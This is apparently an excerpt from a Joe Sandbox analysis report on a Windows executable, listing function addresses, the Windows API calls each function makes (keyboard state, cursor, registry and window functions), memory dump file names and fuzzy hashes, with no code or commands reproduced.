                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00456391 Relevance: 7.6, APIs: 5, Instructions: 130keyboardCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 004563A6
                                                                                                                                                                                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3539004672-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0047D40F Relevance: 7.6, APIs: 5, Instructions: 120sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                                                                                                                                                                                                                                                                                                                                                                                                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                                                                                                                                                                                                                                                                                                                                                                                                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                                                                                                                                                                                                                                                                                                                                                                                                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 327565842-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045C3C1 Relevance: 7.6, APIs: 5, Instructions: 118COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                                                                                                                                                                                                                                                                                                                                                                                                • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                                                                                                                                                                                                                                                                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                                                                                                                                                                                                                                                                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2832842796-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00441C7B Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Enum$CloseDeleteOpen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2095303065-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00436A0B Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00436A24
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: RectWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 861336768-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004478AC Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 004478E2
                                                                                                                                                                                                                                                                                                                                                                                                                                • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                                                                                                                                                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(00000000), ref: 0044796A
                                                                                                                                                                                                                                                                                                                                                                                                                                • TrackPopupMenuEx.USER32(?,00000000,00000000,?,?,00000000), ref: 00447991
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CursorMenuPopupTrack$Proc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1300944170-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004479A0 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004479CC
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 004479D7
                                                                                                                                                                                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 004479F3
                                                                                                                                                                                                                                                                                                                                                                                                                                • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                                                                                                                                                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1822080540-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004550FC Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00445870 Relevance: 7.6, APIs: 5, Instructions: 78windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 00445879
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 004458FB
                                                                                                                                                                                                                                                                                                                                                                                                                                • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3087257052-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00459EF1 Relevance: 7.6, APIs: 5, Instructions: 73COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • IsWindow.USER32(00000000), ref: 00459F13
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32 ref: 00459F2B
